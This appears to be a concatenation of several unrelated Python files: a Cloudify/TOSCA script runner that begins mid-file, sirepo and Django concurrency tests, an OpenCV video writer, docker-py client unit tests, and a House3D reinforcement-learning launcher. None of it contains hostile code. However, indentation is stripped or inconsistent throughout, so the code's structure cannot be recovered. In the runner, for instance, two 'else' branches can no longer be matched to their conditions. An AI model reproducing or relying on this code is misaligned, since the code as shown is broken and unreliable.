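# {'last_output': <last plain line>, 'outputs': {'PARTITION_NAME': '/dev/vdb1'}}.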
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
            ctx.logger.info('Output name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
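# Design note on OutputConsumer: stdout/stderr are drained on daemon threads
# so a chatty script cannot fill the OS pipe buffer and deadlock the
# process.poll() loop inside execute() above.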
new_script_process = {'env': env_map}
operationOutputNames = 'PARTITION_NAME'
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/LinuxFileSystem_3_CBS3/linuxPartitionCBS3/tosca.interfaces.relationship.Configure/pre_configure_source/fdisk.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.source.instance.runtime_properties['_a4c_OO:tosca.interfaces.relationship.Configure:pre_configure_source:{0}'.format(k)] = v
ctx.source.instance.runtime_properties['partition_name'] = get_attribute(ctx.source, '_a4c_OO:tosca.interfaces.relationship.Configure:pre_configure_source:PARTITION_NAME')
ctx.source.instance.update()
|
job_concurrency1_test.py
|
# -*- coding: utf-8 -*-
u"""Concurrency testing
This test does not always fail when there is a problem (a false
negative), because it depends on a specific sequence of events
that can't be controlled by the test.
:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_myapp_cancel(fc):
"""https://github.com/radiasoft/sirepo/issues/2346"""
from pykern import pkunit
import time
import threading
from pykern.pkdebug import pkdlog
d = fc.sr_sim_data()
d.models.simulation.name = 'srunit_long_run'
r = 'heightWeightReport'
def _t2():
pkdlog('start 2')
r2 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
                simulationType=d.simulationType,
            ),
        )
pkdlog(r2)
for _ in range(20):
            pkunit.pkok(r2.state != 'error', 'unexpected error state: {}', r2)
if r2.state == 'running':
break
if r2.state == 'canceled':
pkdlog('canceled')
break
time.sleep(.1)
pkdlog('runStatus 2')
r2 = fc.sr_post('runStatus', r2.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r2)
pkdlog('start 1')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
pkdlog(r1)
        pkunit.pkok(r1.state != 'error', 'unexpected error state: {}', r1)
if r1.state == 'running':
break
time.sleep(.1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r1)
t2 = threading.Thread(target=_t2)
t2.start()
time.sleep(.1)
pkdlog('runCancel')
c = fc.sr_post('runCancel', r1.nextRequest)
pkunit.pkeq('canceled', c.state)
pkdlog('start 3')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
        pkunit.pkok(r1.state != 'error', 'unexpected error state: {}', r1)
if r1.state == 'running':
break
time.sleep(.1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r1)
c = fc.sr_post('runCancel', r1.nextRequest)
pkunit.pkeq('canceled', c.state)
def test_elegant_concurrent_sim_frame(fc):
"""https://github.com/radiasoft/sirepo/issues/2474"""
from pykern import pkunit
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdlog, pkdp
import sirepo.sim_data
import threading
import time
def _get_frames():
for i in range(3):
f = fc.sr_get_json(
'simulationFrame',
PKDict(frame_id=s.frame_id(d, r1, 'elementAnimation19-5', 0)),
)
pkunit.pkeq('completed', f.state)
def _t2(get_frames):
get_frames()
    d = fc.sr_sim_data(sim_name='Backtracking', sim_type='elegant')
s = sirepo.sim_data.get_class(fc.sr_sim_type)
r = 'animation'
r1 = PKDict()
try:
pkdlog('start 1')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
            pkunit.pkok(r1.state != 'error', 'unexpected error state: {}', r1)
if r1.state == 'completed':
break
time.sleep(1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to complete: {}', r1)
t2 = threading.Thread(target=_t2, args=(_get_frames,))
t2.start()
_get_frames()
t2.join()
finally:
if r1.get('nextRequest'):
fc.sr_post('runCancel', r1.nextRequest)
|
videowriter.py
|
# video writer
# * writes frames at a fixed rate even if camera's rate varies or is imprecise,
# possibly dropping or repeating frames in the process
# (note: for LifeCam, the frame rate depends on the exposure)
# * also writes trajectories (which need to be in sync with frames written)
# * stop() needs to be called at the end of video, unless VideoWriter is
# instantiated with "with"
# code comes from
# Ulrich Stern
# https://github.com/ulrichstern/SkinnerTrax/blob/master/rt-trx/rt-trx.py
# modified by Matias Andina 2020-02-01
import queue
import threading
import cv2
import time
import numpy as np
class VideoWriter:
_EXT = ".avi"
# note: extension ".avi" will be added to given video filename
def __init__(self, filename=None, fps=20.0, resolution = (640,480)):
self.filename = filename
self.empty_filename = filename is None
if self.empty_filename:
return
print ("\nwriting video to %s" %filename)
if resolution is None:
resolution = (320, 240)
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.fps = fps
self.dt = 1.0/fps
self.resolution = resolution
# We will put frames on a queue and get them from there
self.q = queue.Queue()
self._stop = False
# n is the frame number
self.n = 0
self.wrtr = threading.Thread(target=self.recorder)
self.wrtr.start()
# writer thread
def recorder(self):
# initialize things to None
# we will receive tuples, lastframe_ts has the frame and timestamp
lastframe_ts = t0 = video_writer = None
while True:
if self._stop:
break
frame_ts = lastframe_ts
# while we have frames in queue get most recent frame
while not self.q.empty():
                # get the queued (frame, timestamp) tuple
frame_ts = self.q.get_nowait()
# only do things with frames that are not None
if frame_ts is not None:
lastframe_ts = frame_ts
# unpack
frame, ts = frame_ts
if video_writer is None:
# initialize cv2 video_writer
video_writer = cv2.VideoWriter(self.filename + self._EXT,
self.fourcc,
self.fps,
self.resolution,
isColor= self.is_color(frame))
t0 = time.time()
# write frame
video_writer.write(frame)
# write timestamp
self.write_timestamp(timestamp=ts)
self.n += 1
if t0 is None:
dt = self.dt
else:
dt = max(0, t0 + self.n * self.dt - time.time())
            # sleep until the n-th frame is due (t0 + n*dt) so the output keeps a fixed frame rate
time.sleep(dt)
# for "with"
def __enter__(self): return self
def __exit__(self, exc_type, exc_value, traceback):
if not self.empty_filename and not self._stop:
self.stop()
# write frame; can be called at rate different from fps
def put_to_q(self, frame, timestamp):
if not self.empty_filename:
            # put frame and timestamp as a tuple into the queue
self.q.put((frame, timestamp))
# returns number (0,1,...) of next frame written to video; None if no video
# written
def frameNum(self): return None if self.empty_filename else self.n
    # returns the video filename (without extension), None if no video written
    # (renamed from filename() because the instance attribute self.filename
    # set in __init__ shadows a method of the same name)
    def get_filename(self): return self.filename
# stop video writer
def stop(self):
if not self.empty_filename:
self._stop = True
self.wrtr.join()
    def is_color(self, frame):
        # color frames carry a third (channel) dimension
        return len(frame.shape) == 3
def write_timestamp(self, timestamp):
# '%Y-%m-%dT%H:%M:%S.%f' is better than '%Y-%m-%dT%H:%M:%S:%f'
timestamp = timestamp.strftime('%Y-%m-%dT%H:%M:%S.%f')
# this will write timestamps to file
# mind that timestamp must be in a [] for numpy to like it
with open(self.filename + "_timestamp.csv",'a') as outfile:
np.savetxt(outfile, [timestamp],
delimiter=',', fmt='%s')
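# Minimal usage sketch (hypothetical capture loop; get_frame() stands in for a
# real camera read returning a BGR frame plus a datetime timestamp):
#
#     with VideoWriter("out", fps=20.0, resolution=(640, 480)) as vw:
#         while recording:
#             frame, ts = get_frame()
#             vw.put_to_q(frame, ts)
#
# put_to_q() may be called faster or slower than fps; recorder() drops or
# repeats frames as needed to keep the output at a fixed rate.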
|
api_test.py
|
import datetime
import json
import io
import os
import re
import shutil
import socket
import tempfile
import threading
import time
import unittest
import docker
from docker.api import APIClient
import requests
from requests.packages import urllib3
import six
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
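    # Dispatch to the canned response registered in fake_api: responses are
    # keyed either by URL alone or by a (URL, method) pair, and unknown
    # endpoints raise so that typos in tests surface immediately.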
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream, tty=False):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class BaseAPIClientTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.api.client.APIClient',
get=fake_get,
post=fake_post,
put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = APIClient()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(BaseAPIClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
APIClient(version=1.12)
assert str(
excinfo.value
) == 'Version parameter must be a string or None. Found float'
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
assert url == '{0}{1}'.format(url_prefix, 'hello/somename/world')
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
assert url == '{0}{1}'.format(
url_prefix, 'hello/somename/world/someothername'
)
url = self.client._url('/hello/{0}/world', 'some?name')
assert url == '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
url = self.client._url("/images/{0}/push", "localhost:5000/image")
assert url == '{0}{1}'.format(
url_prefix, 'images/localhost:5000/image/push'
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
assert url == '{0}{1}'.format(url_prefix, 'simple')
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
assert url == '{0}{1}'.format(url_base, 'hello/somename/world')
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = APIClient(version="auto")
assert isinstance(client._version, six.string_types)
        assert client._version != "auto"
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
assert isinstance(version, six.string_types)
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_login(self):
self.client.login('sakuya', 'izayoi')
args = fake_request.call_args
assert args[0][0] == 'POST'
assert args[0][1] == url_prefix + 'auth'
assert json.loads(args[1]['data']) == {
'username': 'sakuya', 'password': 'izayoi'
}
assert args[1]['headers'] == {'Content-Type': 'application/json'}
assert self.client._auth_configs['auths'] == {
'docker.io': {
'email': None,
'password': 'izayoi',
'username': 'sakuya',
'serveraddress': None,
}
}
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True,
timeout=None
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True,
timeout=None
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True,
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = APIClient(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = APIClient(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = APIClient(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = APIClient(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = APIClient(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
assert 'SecurityOpt' in result
assert result['SecurityOpt'] == security_opt
with pytest.raises(TypeError):
self.client.create_host_config(security_opt='wrong')
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str.decode('utf-8')
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
class StreamTest(unittest.TestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
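        # Send the canned chunked response before reading anything, then consume
        # the request headers and body so the client-side write can complete;
        # this exercises the client's handling of a response that arrives early.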
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with APIClient(base_url="http+unix://" + self.socket_file) as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
assert list(stream) == [
str(i).encode() for i in range(50)]
class UserAgentTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(
APIClient,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = APIClient()
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-sdk-python/%s' % docker.__version__
assert headers['User-Agent'] == expected
def test_custom_user_agent(self):
client = APIClient(user_agent='foo/bar')
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
assert headers['User-Agent'] == 'foo/bar'
class DisableSocketTest(unittest.TestCase):
class DummySocket(object):
def __init__(self, timeout=60):
self.timeout = timeout
def settimeout(self, timeout):
self.timeout = timeout
def gettimeout(self):
return self.timeout
def setUp(self):
self.client = APIClient()
def test_disable_socket_timeout(self):
"""Test that the timeout is disabled on a generic socket object."""
socket = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
def test_disable_socket_timeout2(self):
"""Test that the timeouts are disabled on a generic socket object
and it's _sock object if present."""
socket = self.DummySocket()
socket._sock = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout is None
def test_disable_socket_timout_non_blocking(self):
"""Test that a non-blocking socket does not get set to blocking."""
socket = self.DummySocket()
socket._sock = self.DummySocket(0.0)
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout == 0.0
|
train_rl_room.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import h5py
import time
import argparse
import numpy as np
import os, sys, json
import os.path as osp
import torch
import torch.nn as nn
import torch.multiprocessing as mp
import _init_paths
from nav.loaders.nav_reinforce_loader import NavReinforceDataset
from nav.models.navigator import Navigator
# from nav.reinforce.eval_process import eval
from nav.reinforce.eval_room_process import eval
from nav.reinforce.train_room_process import train
from nav.reinforce.imitation_process import imitation
def main(args):
mp.set_start_method('forkserver', force=True)
args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
args.gpus = [int(x) for x in args.gpus]
# set up shared_model
checkpoint_path = osp.join(args.checkpoint_dir, '%s.pth' % args.start_from)
checkpoint = torch.load(checkpoint_path)
shared_nav_model = Navigator(checkpoint['opt'])
shared_nav_model.load_state_dict(checkpoint['model_state'])
shared_nav_model.cpu()
shared_nav_model.share_memory()
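    # With share_memory(), the train/imitation/eval processes spawned below all
    # read and update the same parameter tensors in place (Hogwild-style
    # asynchronous training), so no explicit gradient exchange is needed.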
print('shared_nav_model set up.')
# some arguments need to be copied from start_from
args.use_action = checkpoint['opt']['use_action']
args.nav_types = ['room']
# processes
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
# train
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_nav_model, counter, lock))
p.start()
processes.append(p)
# imitation
p = mp.Process(target=imitation, args=(args.num_processes, args, shared_nav_model, counter))
p.start()
processes.append(p)
# eval
p = mp.Process(target=eval, args=(args.num_processes+1, args, shared_nav_model, counter, 'val'))
p.start()
processes.append(p)
# join
for p in processes:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Data input settings
parser.add_argument('--data_json', type=str, default='cache/prepro/reinforce/data.json')
parser.add_argument('--data_h5', type=str, default='cache/prepro/reinforce/data.h5')
parser.add_argument('--imitation_data_json', type=str, default='cache/prepro/imitation/data.json')
parser.add_argument('--imitation_data_h5', type=str, default='cache/prepro/imitation/data.h5')
parser.add_argument('--path_feats_dir', type=str, default='cache/path_feats')
parser.add_argument('--path_images_dir', type=str, default='cache/path_images')
parser.add_argument('--target_obj_conn_map_dir', type=str, default='data/target-obj-conn-maps')
parser.add_argument('--pretrained_cnn_path', type=str, default='cache/hybrid_cnn.pt')
parser.add_argument('--house_meta_dir', type=str, default='pyutils/House3D/House3D/metadata')
parser.add_argument('--house_data_dir', type=str, default='data/SUNCGdata/house')
parser.add_argument('--checkpoint_dir', type=str, default='output/nav_room')
parser.add_argument('--seed', type=int, default=24)
# multiprocess settings
parser.add_argument('--num_processes', type=int, default=12)
# log settings
parser.add_argument('--max_epochs', type=int, default=500)
parser.add_argument('--num_iters_per_epoch', type=int, default=1000)
parser.add_argument('--tb_dir', type=str, default='log_dir/nav_room')
parser.add_argument('--log_dir', type=str, default='log_dir/nav_room')
# Navigator settings
parser.add_argument('--shortest_path_ratio', type=float, default=1.0)
parser.add_argument('--max_episode_length', type=int, default=120)
parser.add_argument('--max_threads_per_gpu', type=int, default=1)
parser.add_argument('--mult_increasing_per_iters', type=int, default=2500)
parser.add_argument('--max_seq_length', type=int, default=80, help='max_seq_length')
parser.add_argument('--rnn_type', type=str, default='lstm')
parser.add_argument('--rnn_size', type=int, default=256)
parser.add_argument('--num_layers', type=int, default=1)
parser.add_argument('--rnn_dropout', type=float, default=0.1)
parser.add_argument('--fc_dropout', type=float, default=0.0)
parser.add_argument('--seq_dropout', type=float, default=0.0)
parser.add_argument('--fc_dim', type=int, default=64)
parser.add_argument('--act_dim', type=int, default=64)
# Output settings
parser.add_argument('--start_from', type=str, default='im0')
parser.add_argument('--id', type=str, default='rl0')
# Optimizer
parser.add_argument('--batch_size', type=int, default=20, help='batch size in number of questions per batch')
parser.add_argument('--grad_clip', type=float, default=0.1, help='clip gradients at this value')
parser.add_argument('--learning_rate', type=float, default=1e-5, help='learning rate')
parser.add_argument('--lr_decay', type=int, default=1, help='if decay learning rate')
parser.add_argument('--learning_rate_decay_start', type=int, default=6000, help='at what iters to start decaying learning rate')
parser.add_argument('--learning_rate_decay_every', type=int, default=6000, help='every how many iters thereafter to drop LR by half')
parser.add_argument('--im_learning_rate_decay_start', type=int, default=6000, help='learning rate decay start on Imitation')
parser.add_argument('--im_learning_rate_decay_every', type=int, default=6000, help='learning rate decay every on Imitation')
parser.add_argument('--optim_alpha', type=float, default=0.8, help='alpha for adam')
parser.add_argument('--optim_beta', type=float, default=0.999, help='beta used for adam')
parser.add_argument('--optim_epsilon', type=float, default=1e-8, help='epsilon that goes into denominator for smoothing')
parser.add_argument('--weight_decay', type=float, default=1e-3, help='weight decay for l2 regularization')
args = parser.parse_args()
# update log_dir and tb_dir
args.log_dir = osp.join(args.log_dir, args.id)
args.tb_dir = osp.join(args.tb_dir, args.id)
if not osp.exists(args.log_dir): os.makedirs(args.log_dir)
if not osp.exists(args.tb_dir): os.makedirs(args.tb_dir)
# main
main(args)
|
tests.py
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import (
City, CityCountryProxy, Country, EUCity, EUCountry, Person, PersonProfile,
)
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
